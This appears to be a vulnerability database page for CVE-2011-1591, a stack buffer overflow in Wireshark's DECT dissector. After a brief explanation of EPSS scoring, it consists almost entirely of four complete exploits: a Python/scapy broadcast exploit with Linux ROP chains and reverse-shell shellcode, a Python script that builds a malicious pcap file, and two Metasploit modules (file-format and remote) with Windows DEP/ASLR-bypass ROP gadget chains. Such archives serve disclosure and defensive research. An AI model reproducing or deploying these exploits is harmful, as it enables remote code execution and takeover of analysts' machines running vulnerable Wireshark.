CVE-2011-1591 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

#!/usr/bin/env python # -*- coding: iso-8859-15 -*- a = """ \n\t-- CVE: 2011-1591 : Wireshark <= 1.4.4 packet-dect.c dissect_dect() --\n # # -------- Team : Consortium-of-Pwners # -------- Author : ipv # -------- Impact : high # -------- Target : Archlinux wireshark-gtk-1.4.3-1-i686.pkg.tar.xz # -------- Description # # This code exploits a remote stack based buffer overflow in the DECT dissector of # wireshark. ROP chains aims to recover dynamically stack address, mprotect it and stack pivot to # shellcode located the payload. # All the process is automated, and bypass any NX/ALSR. # # Operating Systems tested : [see the summary] with scapy >= 2.5 # For any comments, remarks, news, please mail me : ipv _at_ [team] . net ###########################################################################\n""" import sys, struct if sys.version_info >= (2, 5): from scapy.all import * else: from scapy import * # align def _x(v): return struct.pack("<I", v) # Gadget Table - Arch linux v2010.05 default package # - wireshark-cli-1.4.3-1-i686.pkg.tar.xz # - wireshark-gtk-1.4.3-1-i686.pkg.tar.xz arch_rop_chain = [ # Safe SEIP overwrite _x(0x8069acb), # pop ebx ; pop esi ; pop ebp _x(0), _x(0x80e9360), _x(0), # fake (arg1, arg2, arg3), to avoid crash # mprotect 1st arg : stack & 0xffff0000 _x(0x8067d90), # push esp ; pop ebp _x(0x8081f2e), # xchg ebp eax _x(0x80f9d7f), # xchg ecx, eax _x(0x8061804), # pop eax _x(0xffff0000), # _x(0x80c69f0), # xchg edi, eax _x(0x80ff067), # and ecx edi ; dec ecx _x(0x8077c53), # inc ecx ; sub al 0x5d _x(0x8061804), # pop eax _x(0x7f16a5d0), # avoid crash with dec dword [ecx-0x76fbdb8c] _x(0x8048360), # xchg ecx eax _x(0x8089f46), # xchg edx eax ; std ; dec dword [ecx-0x76fbdb8c] _x(0x8067d90), # push esp ; pop ebp _x(0x8081f2e), # xchg ebp eax _x(0x8067d92)*7, # ret # 1st arg of mprotect is on esp+48 address (see below) _x(0x80745f9), # mov [eax+0x50] edx ; pop ebp _x(0), # we search address of mprotect (@mprotect = @fopen + 0x6fe70) _x(0x8065226), # pop eax _x(0x81aca20-0xc), # got[fopen] _x(0x8074597), # mov eax [eax+0xc] _x(0x8048360), # xchg ecx eax _x(0x8065226), # pop eax _x(0x6fe70), _x(0x8081f2e), # xchg ebp eax _x(0x806973d), # add ecx ebp _x(0x08104f61), # jmp *%ecx _x(0x0811eb63), # pop ebx, pop esi, pop edi # mprotect args (base_addr, page size, mode) _x(0), # Stack Map that is updated dynamically (see upper) _x(0x10000), # PAGE size 0x1000 _x(0x7), # RWX Mode # now we can jump to our lower addressed shellcode by decreasing esp register _x(0x8061804), # pop eax _x(0xff+0x50), # esp will be decreased of 0xff + 0x50 bytes; _x(0x80b8fc8), # xchg edi eax _x(0x8067d90), # push esp ; pop ebp _x(0x80acc63), # sub ebp, edi ; dec ecx _x(0x8081f2e), # xchg ebp eax _x(0x0806979e) # jmp *eax ] # Gadget Table - Bt4 compiled without SSP/FortifySource # Source wireshark 1.4.3 labs_rop_chain = [ # Safe SEIP overwrite _x(0x08073fa1), # pop ebx ; pop esi ; pop ebp _x(0), _x(0x0808c4d3), _x(0), # fake (arg1, arg2, arg3), to avoid crash # sys_mprotect : eax=125(0x7D) ; ebx=address base ; ecx = size page ; edx = mode # mprotect 3r d arg _x(0x080e64cf), # pop edx ; pop es ; add cl cl _x(0x7), _x(0x0), # RWX mode 0x7 # mprotect 1st arg (logical AND with stack address to get address base), _x(0x080a1711), # mov edi esp ; dec ecx _x(0x0815b74f), # pop ecx _x(0xffff0000), # _x(0x0804c73c), # xchg ecx eax _x(0x080fadd7), # and edi eax ; dec ecx _x(0x0804c73c), # xchg ecx eax _x(0x080af344), # mov ebx edi ; dec ecx # mprotect 2nd arg _x(0x0815b74f), # pop ecx _x(0x10000), # PAGE size 0x10000 # int 0x80 : here vdso is not randomized, so, we use it! _x(0x80d8b71), # pop eax _x(0x7D), # 0x7D = mprotect syscall _x(0x804e6df), # pop *esi _x(0xffffe411), # int 0x80 # _x(0xffffe414), # @sysenter in .vdso _x(0x080ab949), # jmp *esi # now we can jump to our lower addressed shellcode by decreasing esp register _x(0x0815b74f), # pop ecx _x(256), # esp will be decreased of 256bytes _x(0x080a1711), # mov edi esp ; dec ecx _x(0x081087d3), # sub edi ecx ; dec ecx _x(0x080f7cb1) # jmp *edi ] addr_os = { # ID # OS # STACK SIZE # GADGET TABLE 1 : ["Arch Linux 2010.05 ", 0xb9, arch_rop_chain], # wireshark-gtk-1.4.3-1-i686.pkg.tar.xz 2 : ["Labs test ", 0xbf, labs_rop_chain], -1 : ["Debian 5.0.8 Lenny ", -3, False], # wireshark_1.0.2-3+lenny12_i386.deb -2 : ["Debian 6.0.2 Squeeze ", -1, False], # wireshark_1.2.11-6+squeeze1_i386.deb -3 : ["Fedora 14 ", -1, False], # wireshark-1.4.3-1.2.2.i586.rpm -4 : ["OpenSuse 11.3 ", -1, False], # wireshark-1.4.3-1.2.2.i586.rpm -5 : ["Ubuntu 10.10 | 11.04 ", -1, False], # -6 : ["Gentoo * ", -2, False] # } print a def usage(): print "Please select and ID >= 0 :\n" print " ID TARGET INFO" print "--------------------------------------------------------------------" for i in addr_os.iteritems(): print " %2d -- %s "%(i[0], i[1][0]), if i[1][1] == -1: print "Default package uses LibSSP & Fortify Source" elif i[1][1] == -2: print "Compiled/Build with Fortify Source" elif i[1][1] == -3: print "DECT protocol not supported" else: print "VULN -> Stack size %d"%(i[1][1]) sys.exit(1) if len(sys.argv) == 1: usage() elif addr_os.has_key(int(sys.argv[1])) is False: usage() elif int(sys.argv[1]) < 0: usage() target = addr_os[int(sys.argv[1])] print "\n[+] Target : %s"%target[0] rop_chain = "".join([ rop for rop in target[2]]) # msfpayload linux/x86/shell_reverse_tcp LHOST=127.0.0.1 C rev_tcp_shell = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\x7f\x00\x00\x01\x66\x68\x11\x5c\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; SEIP_SMASH = target[1] print "\t[+] Length for smashing SEIP : 0x%x(%d)"%(SEIP_SMASH, SEIP_SMASH) nopsled = "\x90" head_nop = 50 shellcode = nopsled * head_nop + rev_tcp_shell + nopsled * (SEIP_SMASH-len(rev_tcp_shell) - head_nop) payload = shellcode + rop_chain # stack alignment if (len(payload) % 2): diff = len(payload) % 2 payload = payload[(2-diff):] print "\t[+] Payload length : %d"%len(payload) evil_packet = Ether(type=0x2323, dst="ff:ff:ff:ff:ff:ff") / payload # evil_packet.show() print "\t[+] Evil packet length : %d"%len(evil_packet) print "\t[+] Sending packet to broadcast" sendp(evil_packet)

#!/usr/bin/env python # Vulnerable app: Wireshark 1.4.1-1.4.4 # Author: sickness # Download : # OS: Tested it on Windows XP SP2 and SP3 but it should work on every Windows with DEP off (still working on a ROP exploit) # DATE : 17.04.2011 # Fixed in latest version 1.4.5 # DO NOT FORGET TO FEEL THE PWNSAUCE WITH: http://redmine.corelan.be:8800/projects/pvefindaddr ################################################################### # Offset might change! # Watch out for other bad chars!! # Current bad chars: \x00\x0a\x0d\x09 ################################################################### # References: # https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836 # https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838 ################################################################### import sys from scapy.all import * #payload=calc.exe #ppr is from a non-ASLR enabled wireshark module evil = Ether(type=0x2323)/("\x41" * 1239 + "\xeb\x06\x90\x90" + "\x5D\x10\x94\x62" + "\x90" * 16 + "\x33\xc9\x83\xe9\xce\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x17\x22\xfd\x6a\x83\xee\xfc\xe2\xf4\xeb\xca\x74\x6a\x17\x22\x9d\xe3\xf2\x13\x2f\x0e\x9c\x70\xcd\xe1\x45\x2e\x76\x38\x03\xa9\x8f\x42\x18\x95\xb7\x4c\x26\xdd\xcc\xaa\xbb\x1e\x9c\x16\x15\x0e\xdd\xab\xd8\x2f\xfc\xad\xf5\xd2\xaf\x3d\x9c\x70\xed\xe1\x55\x1e\xfc\xba\x9c\x62\x85\xef\xd7\x56\xb7\x6b\xc7\x72\x76\x22\x0f\xa9\xa5\x4a\x16\xf1\x1e\x56\x5e\xa9\xc9\xe1\x16\xf4\xcc\x95\x26\xe2\x51\xab\xd8\x2f\xfc\xad\x2f\xc2\x88\x9e\x14\x5f\x05\x51\x6a\x06\x88\x88\x4f\xa9\xa5\x4e\x16\xf1\x9b\xe1\x1b\x69\x76\x32\x0b\x23\x2e\xe1\x13\xa9\xfc\xba\x9e\x66\xd9\x4e\x4c\x79\x9c\x33\x4d\x73\x02\x8a\x4f\x7d\xa7\xe1\x05\xc9\x7b\x37\x7d\x23\x70\xef\xae\x22\xfd\x6a\x47\x4a\xcc\xe1\x78\xa5\x02\xbf\xac\xd2\x48\xc8\x41\x4a\x5b\xff\xaa\xbf\x02\xbf\x2b\x24\x81\x60\x97\xd9\x1d\x1f\x12\x99\xba\x79\x65\x4d\x97\x6a\x44\xdd\x28\x09\x76\x4e\x9e\x44\x72\x5a\x98\x6a" + "\x90" * 4500) wrpcap("evil.pcap",evil) print "\n" print "Evil .pcap file created!" print "It's pwnsauce time!\n"

## # $Id: wireshark_packet_dect.rb 12364 2011-04-19 07:53:58Z sinn3r $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Wireshark <= 1.4.4 When opening a malicious .pcap file in Wireshark, a stack buffer occurs, resulting in arbitrary code execution. This exploit bypasses DEP & ASLR and works on XP, Vista & Windows 7. }, 'License' => MSF_LICENSE, 'Author' => [ 'sickness', #found the vulnerabilitiy 'corelanc0d3r' #rop exploit + msf module ], 'Version' => '$Revision: 12364 $', 'References' => [ [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838' ], [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836' ], [ 'URL', 'http://www.exploit-db.com/exploits/17185' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 936, 'DisableNops' => 'True', }, 'Platform' => 'win', 'Targets' => [ [ '32-bit Windows Universal (Generic DEP & ASLR Bypass)', { 'OffSet' => 1243, 'Ret' => 0x667c484d, #libgnutl pivot - tx Lincoln } ], ], 'Privileged' => false, 'DisclosureDate' => 'Apr 18 2011', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ true, 'pcap file', 'passwords.pcap']), ], self.class) end def junk return rand_text(4).unpack("L")[0].to_i end def exploit print_status("Creating '#{datastore['FILENAME']}' file ...") global_header = "\xd4\xc3\xb2\xa1" # magic_number global_header << "\x02\x00" # major version global_header << "\x04\x00" # minor version global_header << "\x00\x00\x00\x00" # GMT to local correction global_header << "\x00\x00\x00\x00" # accuracy global_header << "\xff\x7f\x00\x00" # snaplen global_header << "\x01\x00\x00\x00" # data link type packet_header = "\x26\x32\xac\x4d" #timestamp seconds packet_header << "\xda\xfa\x00\x08" #timestamp microseconds packet_header << "\x04\x06\x00\x00" #nr of octets of packet in file packet_header << "\x04\x06\x00\x00" #actual size of packet (1540) ptype = "\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x23\x23" print_status("Preparing payload") pivot = [target.ret].pack('V') # pvefindaddr rop 'n roll # tx dadr00p (https://twitter.com/dietersar) for testing the offsets below rop_pivot = [ 0x618d7d0e, # RET 0x618d7d0e, # RET 0x618d7d0e, # RET 0x64f9d5ec, # ADD ESP,0C # RET - libfontconfig-1.dll 0x618d7d0e, # RET <- don't count on this one ! 0x618d7d0e, # RET 0x618d7d0e, # RET 0x618d7d0e, # RET 0x61C14268, # ADD ESP,24 # RETN - freetype6.dll 0xFFFFFFFF, # crash baby ! 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0x618d7d0e, 0x618d7d0e, 0x618d7d0e, 0x618d7d0e, ].pack("V*") rop_gadgets = [ 0x6d7155cb, # PUSH ESP # POP EBX # POP EBP # RETN **[libpangoft2-1.0-0.dll] junk, 0x6d596e31, # MOV EAX,EBX # POP EBX # POP EBP # RETN **[libgio-2.0-0.dll] junk, junk, 0x61c14552, # POP EBX # RETN ** [freetype6.dll] 0x00000800, # size - 0x800 should be more than enough 0x61c14043, # POP ESI # RETN ** [freetype6.dll] 0x0000009C, 0x6d58321a, # ADD EAX,ESI # POP ESI # POP EBP # RETN **[libgio-2.0-0.dll] junk, junk, 0x68610a27, # XCHG EAX,EBP # RETN ** [libglib-2.0-0.dll] 0x629445a6, # POP EAX # RETN ** [libatk-1.0-0.dll] 0x62d9027c, # 0x6c385913, # MOV EAX,DWORD PTR DS:[EAX] # ADD CL,CL # RETN ** [libgdk-win32-2.0-0.dll] 0x617bc526, # XCHG EAX,ESI # ADD AL,10 # ADD CL,CL # RETN ** [libgtk-win32-2.0-0.dll] 0x64f8c692, # POP EDX # RETN ** [libfontconfig-1.dll] 0x00000040, # 0x619638db, # POP ECX # RETN ** [libgtk-win32-2.0-0.dll] 0x6536B010, # RW 0x618d7d0d, # POP EDI # RETN ** [libgtk-win32-2.0-0.dll] 0x618d7d0e, # RET 0x64fa0c15, # POP EAX # RETN ** [libfontconfig-1.dll] 0x618d7d0e, # RET 0x61963fdb, # PUSHAD # RETN ** [libgtk-win32-2.0-0.dll] ].pack("V*") pivot = [target.ret].pack('V') buffer = rand_text(131) buffer << rop_pivot buffer << rop_gadgets nops = make_nops(target['OffSet'] - (buffer.length) - (payload.encoded.length)) buffer << nops buffer << payload.encoded buffer << pivot filler = 1540 - buffer.length buffer << rand_text(filler) filecontent = global_header filecontent << packet_header filecontent << ptype filecontent << buffer print_status("Writing payload to file, " + filecontent.length.to_s()+" bytes") file_create(filecontent) end end

## # $Id: wireshark_packet_dect.rb 12371 2011-04-19 16:41:58Z sinn3r $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Capture def initialize(info = {}) super(update_info(info, 'Name' => 'Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow (remote)', 'Description' => %q{ This module exploits a stack buffer overflow in Wireshark <= 1.4.4 by sending an malicious packet.) }, 'License' => MSF_LICENSE, 'Author' => [ 'Paul Makowski', #Initial discovery 'sickness', #proof of concept 'corelanc0d3r', #rop exploit + msf module ], 'Version' => '$Revision: 12371 $', 'References' => [ [ 'CVE', '2011-1591'], [ 'OSVDB', '71848'], [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838' ], [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836' ], [ 'URL', 'http://www.exploit-db.com/exploits/17185' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 936, 'DisableNops' => 'True', }, 'Platform' => 'win', 'Targets' => [ [ 'Win32 Universal (Generic DEP & ASLR Bypass)', { 'OffSet' => 1243, 'Ret' => 0x667c484d, #libgnutl pivot - tx Lincoln } ], ], 'Privileged' => false, 'DisclosureDate' => 'Apr 18 2011', 'DefaultTarget' => 0)) register_options([ OptBool.new('LOOP', [true, 'Send the packet every X seconds until the job is killed', false]), OptInt.new('DELAY', [true, 'This option sets the delay between sent packets', 5]) ], self.class) register_advanced_options([ OptBool.new("ExitOnSession", [ false, "Return from the exploit after a session has been created", true ]), ], self.class) deregister_options('FILTER','PCAPFILE','RHOST','SNAPLEN','TIMEOUT','UDP_SECRET','NETMASK','GATEWAY') end def junk return rand_text(4).unpack("L")[0].to_i end def exploit ptype = "\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x23\x23" print_status("Preparing payload") pivot = [target.ret].pack('V') # pvefindaddr rop 'n roll # tx dadr00p (https://twitter.com/dietersar) for testing the offsets below rop_pivot = [ 0x618d7d0e, # RET 0x618d7d0e, # RET 0x618d7d0e, # RET 0x64f9d5ec, # ADD ESP,0C # RET - libfontconfig-1.dll 0x618d7d0e, # RET <- don't count on this one ! 0x618d7d0e, # RET 0x618d7d0e, # RET 0x618d7d0e, # RET 0x61C14268, # ADD ESP,24 # RETN - freetype6.dll 0xFFFFFFFF, # crash baby ! 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0x618d7d0e, 0x618d7d0e, 0x618d7d0e, 0x618d7d0e, ].pack("V*") rop_gadgets = [ 0x6d7155cb, # PUSH ESP # POP EBX # POP EBP # RETN **[libpangoft2-1.0-0.dll] junk, 0x6d596e31, # MOV EAX,EBX # POP EBX # POP EBP # RETN **[libgio-2.0-0.dll] junk, junk, 0x61c14552, # POP EBX # RETN ** [freetype6.dll] 0x00000800, # size - 0x800 should be more than enough 0x61c14043, # POP ESI # RETN ** [freetype6.dll] 0x0000009C, 0x6d58321a, # ADD EAX,ESI # POP ESI # POP EBP # RETN **[libgio-2.0-0.dll] junk, junk, 0x68610a27, # XCHG EAX,EBP # RETN ** [libglib-2.0-0.dll] 0x629445a6, # POP EAX # RETN ** [libatk-1.0-0.dll] 0x62d9027c, # 0x6c385913, # MOV EAX,DWORD PTR DS:[EAX] # ADD CL,CL # RETN ** [libgdk-win32-2.0-0.dll] 0x617bc526, # XCHG EAX,ESI # ADD AL,10 # ADD CL,CL # RETN ** [libgtk-win32-2.0-0.dll] 0x64f8c692, # POP EDX # RETN ** [libfontconfig-1.dll] 0x00000040, # 0x619638db, # POP ECX # RETN ** [libgtk-win32-2.0-0.dll] 0x6536B010, # RW 0x618d7d0d, # POP EDI # RETN ** [libgtk-win32-2.0-0.dll] 0x618d7d0e, # RET 0x64fa0c15, # POP EAX # RETN ** [libfontconfig-1.dll] 0x618d7d0e, # RET 0x61963fdb, # PUSHAD # RETN ** [libgtk-win32-2.0-0.dll] ].pack("V*") pivot = [target.ret].pack('V') buffer = rand_text(131) buffer << rop_pivot buffer << rop_gadgets nops = make_nops(target['OffSet'] - (buffer.length) - (payload.encoded.length)) buffer << nops buffer << payload.encoded buffer << pivot filler = 1500 - buffer.length buffer << rand_text(filler) pkt = ptype pkt << buffer print_status("Sending malicious packet") open_pcap() handler if datastore['LOOP'] while true break if session_created? and datastore['ExitOnSession'] inject(pkt) select(nil,nil,nil,datastore['DELAY']) end else inject(pkt) end close_pcap end end